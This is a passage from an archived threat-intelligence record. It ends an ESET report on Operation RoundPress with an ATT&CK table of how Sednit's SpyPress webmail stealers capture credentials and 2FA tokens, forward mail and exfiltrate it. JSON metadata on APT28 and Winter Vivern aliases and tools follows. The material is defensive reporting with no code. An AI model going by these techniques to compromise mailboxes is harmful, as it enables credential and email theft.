MDaemon.\r\nT1587.001\r\nDevelop Capabilities:\r\nMalware\r\nSednit developed JavaScript stealers\r\n(SpyPress.HORDE, SpyPress.MDAEMON,\r\nSpyPress.ROUNDCUBE, and\r\nSpyPress.ZIMBRA) to steal data from webmail\r\nservers.\r\nInitial Access T1190\r\nExploit Public-Facing\r\nApplication\r\nSednit exploited known and zero-day\r\nvulnerabilities in webmail software to execute\r\nJavaScript code in the context of the victim’s\r\nwebmail window.\r\nExecution T1203\r\nExploitation for\r\nClient Execution\r\nSpyPress payloads are executed when a victim\r\nopens the malicious email in a vulnerable\r\nwebmail client page.\r\nDefense\r\nEvasion\r\nT1027\r\nObfuscated Files or\r\nInformation\r\nSpyPress payloads are obfuscated with an\r\nunknown JavaScript obfuscator.\r\nCredential\r\nAccess\r\nT1187 Forced Authentication\r\nSpyPress payloads can log out users to entice\r\nthem into entering their credentials in a fake login\r\nform.\r\nT1556.006\r\nModify\r\nAuthentication\r\nProcess: Multi-Factor\r\nAuthentication\r\nSpyPress.MDAEMON can steal the 2FA token\r\nand create an application password.\r\nDiscovery T1087.003\r\nAccount Discovery:\r\nEmail Account\r\nSpyPress payloads get information about the\r\nemail account, such as the contact list.\r\nCollection\r\nT1056.003\r\nInput Capture: Web\r\nPortal Capture\r\nSpyPress payloads try to steal webmail\r\ncredentials by creating a hidden login form, to\r\ntrick the browser and password managers into\r\nfilling the credentials.\r\nT1119 Automated Collection\r\nSpyPress payloads automatically collect\r\ncredentials and email messages.\r\nhttps://www.welivesecurity.com/en/eset-research/operation-roundpress/\r\nPage 27 of 28\n\nTactic ID Name Description\r\nT1114.002\r\nEmail Collection:\r\nRemote Email\r\nCollection\r\nSpyPress payloads collect and exfiltrate emails,\r\nfrom the victim’s mailbox.\r\nT1114.003\r\nEmail Collection:\r\nEmail Forwarding\r\nRule\r\nSpyPress.MDAEMON adds a Sieve rule to\r\nforward any incoming email to an attacker-controlled email address.\r\nCommand\r\nand Control\r\nT1071.001\r\nApplication Layer\r\nProtocol: Web\r\nProtocols\r\nC\u0026C communication is done via HTTPS.\r\nT1071.003\r\nApplication Layer\r\nProtocol: Mail\r\nProtocols\r\nIn case of email forwarding rules, the exfiltration\r\nis done via email.\r\nT1132.001\r\nData Encoding:\r\nStandard Encoding\r\nData is base64 encoded before being sent to the\r\nC\u0026C server.\r\nExfiltration\r\nT1020\r\nAutomated\r\nExfiltration\r\nSpyPress payloads automatically exfiltrate\r\ncredentials and email messages to the C\u0026C\r\nserver.\r\nT1041\r\nExfiltration Over C2\r\nChannel\r\nSpyPress payloads exfiltrate data over the C\u0026C\r\nchannel.\r\nSource: https://www.welivesecurity.com/en/eset-research/operation-roundpress/\r\nhttps://www.welivesecurity.com/en/eset-research/operation-roundpress/\r\nPage 28 of 28", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "ETDA" ], "references": [ "https://www.welivesecurity.com/en/eset-research/operation-roundpress/" ], "report_names": [ "operation-roundpress" ], "threat_actors": [ { "id": "23226bab-4c84-4c65-a8d1-7ac10c44b172", "created_at": "2023-04-27T02:04:45.463683Z", "updated_at": "2026-04-10T02:00:04.980143Z", "deleted_at": null, "main_name": "Winter Vivern", "aliases": [ "TA473", "TAG-70", "UAC-0114", "UNC4907" ], "source_name": "ETDA:Winter Vivern", "tools": [ "APERETIF" ], "source_id": "ETDA", "reports": null }, { "id": "e6704f3c-15d7-4e1d-b5a8-e33e7e9bd925", "created_at": "2023-11-04T02:00:07.660461Z", "updated_at": "2026-04-10T02:00:03.385093Z", "deleted_at": null, "main_name": "Winter Vivern", "aliases": [ "TA-473", "UAC-0114", "TA473", "TAG-70" ], "source_name": "MISPGALAXY:Winter Vivern", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "a20598c1-894c-4173-be6e-64a1ce9732bd", "created_at": "2024-11-01T02:00:52.652891Z", "updated_at": "2026-04-10T02:00:05.375678Z", "deleted_at": null, "main_name": "Winter Vivern", "aliases": [ "Winter Vivern", "TA473", "UAC-0114" ], "source_name": "MITRE:Winter Vivern", "tools": null, "source_id": "MITRE", "reports": null }, { "id": "730dfa6e-572d-473c-9267-ea1597d1a42b", "created_at": "2023-01-06T13:46:38.389985Z", "updated_at": "2026-04-10T02:00:02.954105Z", "deleted_at": null, "main_name": "APT28", "aliases": [ "Pawn Storm", "ATK5", "Fighting Ursa", "Blue Athena", "TA422", "T-APT-12", "APT-C-20", "UAC-0001", "IRON TWILIGHT", "SIG40", "UAC-0028", "Sofacy", "BlueDelta", "Fancy Bear", "GruesomeLarch", "Group 74", "ITG05", "FROZENLAKE", "Forest Blizzard", "FANCY BEAR", "Sednit", "SNAKEMACKEREL", "Tsar Team", "TG-4127", "STRONTIUM", "Grizzly Steppe", "G0007" ], "source_name": "MISPGALAXY:APT28", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e3767160-695d-4360-8b2e-d5274db3f7cd", "created_at": "2022-10-25T16:47:55.914348Z", "updated_at": "2026-04-10T02:00:03.610018Z", "deleted_at": null, "main_name": "IRON TWILIGHT", "aliases": [ "APT28 ", "ATK5 ", "Blue Athena ", "BlueDelta ", "FROZENLAKE ", "Fancy Bear ", "Fighting Ursa ", "Forest Blizzard ", "GRAPHITE ", "Group 74 ", "PawnStorm ", "STRONTIUM ", "Sednit ", "Snakemackerel ", "Sofacy ", "TA422 ", "TG-4127 ", "Tsar Team ", "UAC-0001 " ], "source_name": "Secureworks:IRON TWILIGHT", "tools": [ "Downdelph", "EVILTOSS", "SEDUPLOADER", "SHARPFRONT" ], "source_id": "Secureworks", "reports": null }, { "id": "ae320ed7-9a63-42ed-944b-44ada7313495", "created_at": "2022-10-25T15:50:23.671663Z", "updated_at": "2026-04-10T02:00:05.283292Z", "deleted_at": null, "main_name": "APT28", "aliases": [ "APT28", "IRON TWILIGHT", "SNAKEMACKEREL", "Group 74", "Sednit", "Sofacy", "Pawn Storm", "Fancy Bear", "STRONTIUM", "Tsar Team", "Threat Group-4127", "TG-4127", "Forest Blizzard", "FROZENLAKE", "GruesomeLarch" ], "source_name": "MITRE:APT28", "tools": [ "Wevtutil", "certutil", "Forfiles", "DealersChoice", "Mimikatz", "ADVSTORESHELL", "Komplex", "HIDEDRV", "JHUHUGIT", "Koadic", "Winexe", "cipher.exe", "XTunnel", "Drovorub", "CORESHELL", "OLDBAIT", "Downdelph", "XAgentOSX", "USBStealer", "Zebrocy", "reGeorg", "Fysbis", "LoJax" ], "source_id": "MITRE", "reports": null }, { "id": "d2516b8e-e74f-490d-8a15-43ad6763c7ab", "created_at": "2022-10-25T16:07:24.212584Z", "updated_at": "2026-04-10T02:00:04.900038Z", "deleted_at": null, "main_name": "Sofacy", "aliases": [ "APT 28", "ATK 5", "Blue Athena", "BlueDelta", "FROZENLAKE", "Fancy Bear", "Fighting Ursa", "Forest Blizzard", "G0007", "Grey-Cloud", "Grizzly Steppe", "Group 74", "GruesomeLarch", "ITG05", "Iron Twilight", "Operation DealersChoice", "Operation Dear Joohn", "Operation Komplex", "Operation Pawn Storm", "Operation RoundPress", "Operation Russian Doll", "Operation Steal-It", "Pawn Storm", "SIG40", "Sednit", "Snakemackerel", "Sofacy", "Strontium", "T-APT-12", "TA422", "TAG-0700", "TAG-110", "TG-4127", "Tsar Team", "UAC-0028", "UAC-0063" ], "source_name": "ETDA:Sofacy", "tools": [ "ADVSTORESHELL", "AZZY", "Backdoor.SofacyX", "CHERRYSPY", "CORESHELL", "Carberp", "Computrace", "DealersChoice", "Delphacy", "Downdelph", "Downrage", "Drovorub", "EVILTOSS", "Foozer", "GAMEFISH", "GooseEgg", "Graphite", "HATVIBE", "HIDEDRV", "Headlace", "Impacket", "JHUHUGIT", "JKEYSKW", "Koadic", "Komplex", "LOLBAS", "LOLBins", "Living off the Land", "LoJack", "LoJax", "MASEPIE", "Mimikatz", "NETUI", "Nimcy", "OCEANMAP", "OLDBAIT", "PocoDown", "PocoDownloader", "Popr-d30", "ProcDump", "PythocyDbg", "SMBExec", "SOURFACE", "SPLM", "STEELHOOK", "Sasfis", "Sedkit", "Sednit", "Sedreco", "Seduploader", "Shunnael", "SkinnyBoy", "Sofacy", "SofacyCarberp", "SpiderLabs Responder", "Trojan.Shunnael", "Trojan.Sofacy", "USB Stealer", "USBStealer", "VPNFilter", "Win32/USBStealer", "WinIDS", "Winexe", "X-Agent", "X-Tunnel", "XAPS", "XTunnel", "Xagent", "Zebrocy", "Zekapab", "carberplike", "certutil", "certutil.exe", "fysbis", "webhp" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434233, "ts_updated_at": 1775792269, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/e2c747a4021a1d5fcf088e14331c633969283fd9.pdf", "text": "https://archive.orkl.eu/e2c747a4021a1d5fcf088e14331c633969283fd9.txt", "img": "https://archive.orkl.eu/e2c747a4021a1d5fcf088e14331c633969283fd9.jpg" } }